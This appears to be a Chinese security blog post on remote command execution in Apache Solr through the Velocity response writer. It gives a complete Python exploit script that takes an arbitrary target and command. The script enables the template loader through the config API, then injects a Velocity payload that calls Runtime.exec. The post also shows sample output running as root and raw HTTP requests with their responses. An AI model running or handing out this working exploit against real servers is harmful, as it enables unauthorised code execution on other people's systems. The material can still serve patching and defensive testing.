Apache Solr 命令执行

情话
情话
情话
42
文章
2
评论
2020年3月27日15:10:04 评论 1,212 3231字阅读10分46秒
广告也精彩

使用Docker

 docker pull solr
 docker run --name solr2 -d -p 8081:8983 solr

Apache Solr 命令执行

验证脚本

#!/usr/bin/env python
# coding: utf-8

import requests
import sys
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
proxies = {
  "http": "http://127.0.0.1:8080",
  "https": "http://127.0.0.1:8080",
}


if len(sys.argv) != 3:
    print "[+] Usage : ./solr_rce.py target command"
    exit()

target = sys.argv[1]
command = sys.argv[2]


getPathUrl = '/solr/admin/cores?indexInfo=false&wt=json'
try:
        Path = list(json.loads(requests.get(target+getPathUrl).content)['status'].keys())[0]
        headers = {'Content-Type': 'application/json', 'Content-Length':'259'}
        data = '''{
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }'''
        req = requests.post(target+'/solr/'+Path+'/config', headers=headers, data=data)
        
        if req.status_code == 404:
            print "[-] failed !"
            exit()
        elif req.status_code == 200:
            print "[+] Set Config Success!"
        # exec command
        payload = '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27' + command + '%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
        req = requests.get(target+'/solr/'+Path + payload)
        print req.text
except:
    print('解析错误')

使用方法

[[email protected] ~]# python solr_rce2.py http://xx.xxx.xxx.xx whoami
[+] Set Config Success!
 0 root

[[email protected] ~]# 

参考:https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

Apache Solr RCE via Velocity template

Set "params.resource.loader.enabled" as true.

Request:
========================================================================
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
========================================================================


RCE via velocity template
Request:
========================================================================
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
========================================================================


Response:
========================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 56

     0  uid=8983(solr) gid=8983(solr) groups=8983(solr)
========================================================================
继续阅读
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
情话
  • 本文由 发表于 2020年3月27日15:10:04
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
导航网站自动收录漏洞-劫持漏洞 漏洞分析

导航网站自动收录漏洞-劫持漏洞

我想搞个导航网站来着,看着自动收录的网站然后就发现了很多导航网站有这个bug BUG后果:可以在网站上上传任意js html代码,会被劫持,跳转等等。 BUG原因: 大家看图,只要我在我的网站上面,做...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: